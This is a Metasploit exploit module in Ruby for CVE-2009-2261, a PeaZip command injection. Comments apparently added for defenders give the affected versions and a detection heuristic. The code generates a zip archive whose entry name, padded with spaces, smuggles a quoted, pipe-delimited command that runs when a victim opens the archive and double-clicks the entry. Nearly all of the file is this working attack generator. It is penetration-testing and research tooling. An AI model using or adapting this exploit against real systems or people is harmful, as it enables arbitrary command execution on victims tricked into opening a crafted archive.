GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/fileformat/peazip_command_injection.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
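# File-format module for CVE-2009-2261 (PeaZip command injection).
#
# The module writes a zip archive holding a single entry whose *name* carries
# a quoted, pipe-delimited command string. Per the module description, the
# command runs when the recipient opens the archive in PeaZip and
# double-clicks that entry.
#
# Defender notes:
# * Affected: the description states that all versions prior to 2.6.2 are
#   suspected vulnerable (tested on 2.6.1 on Windows). Presumably 2.6.2 and
#   later carry the fix -- confirm against the vendor changelog.
# * Detection: the entry name built below is exactly 255 characters long and
#   contains a double quote and pipe characters after a long run of spaces.
#   Archive scanners can flag entry names containing `"` or `|`.
#   NOTE(review): treat this as a heuristic and validate it on your own data.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (references, platforms, payload
  # constraints) and the FILENAME option naming the generated archive.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PeaZip Zip Processing Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in PeaZip. All
          versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with
          version 2.6.1 on Windows.

          In order for the command to be executed, an attacker must convince someone to
          open a specially crafted zip file with PeaZip, and access the specially file via
          double-clicking it. By doing so, an attacker can execute arbitrary commands
          as the victim user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'pyrokinesis', # Of Nine:Situations:Group
          'jduck'
        ],
        'References' => [
          [ 'CVE', '2009-2261' ],
          [ 'OSVDB', '54966' ],
          [ 'URL', 'http://peazip.sourceforge.net/' ],
          [ 'EDB', '8881' ]
        ],
        'Platform' => %w{linux unix win},
        'Arch' => ARCH_CMD,
        'Payload' => {
          # Space permits a command far longer than the 255-character entry
          # name can hold; #exploit enforces the tighter limit.
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
        'Targets' => [
          ['Automatic', {}],
        ],
        'DisclosureDate' => '2009-06-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.zip']),
      ]
    )
  end

  # Builds the archive and hands the packed bytes to file_create.
  #
  # The single entry's name is "README.TXT", space padding, then the quoted,
  # pipe-delimited command and a ".txt" suffix, 255 characters in total. The
  # entry body is random alphanumeric filler of random length (below 1024).
  #
  # Fails with Failure::BadConfig when the command does not fit in the
  # 255-character name. Without that check the negative padding count makes
  # String#* raise a bare ArgumentError ("negative argument").
  def exploit
    # NOTE: using a command line containing / or \ will result in the command
    # being easily visible to the victim
    cmd = datastore['CMD']

    fname = "README.TXT"
    rest = "\"|#{cmd}|.txt"

    # The name is padded to exactly 255 characters; a longer command leaves
    # no room and must be rejected before the padding is computed.
    padding = 255 - fname.length - rest.length
    if padding.negative?
      fail_with(
        Failure::BadConfig,
        "CMD is #{-padding} character(s) too long for the 255-character archive entry name"
      )
    end

    fname << " " * padding
    fname << rest

    content = rand_text_alphanumeric(rand(1024))

    zip = Rex::Zip::Archive.new
    zip.add_file(fname, content)

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(zip.pack)
  end
end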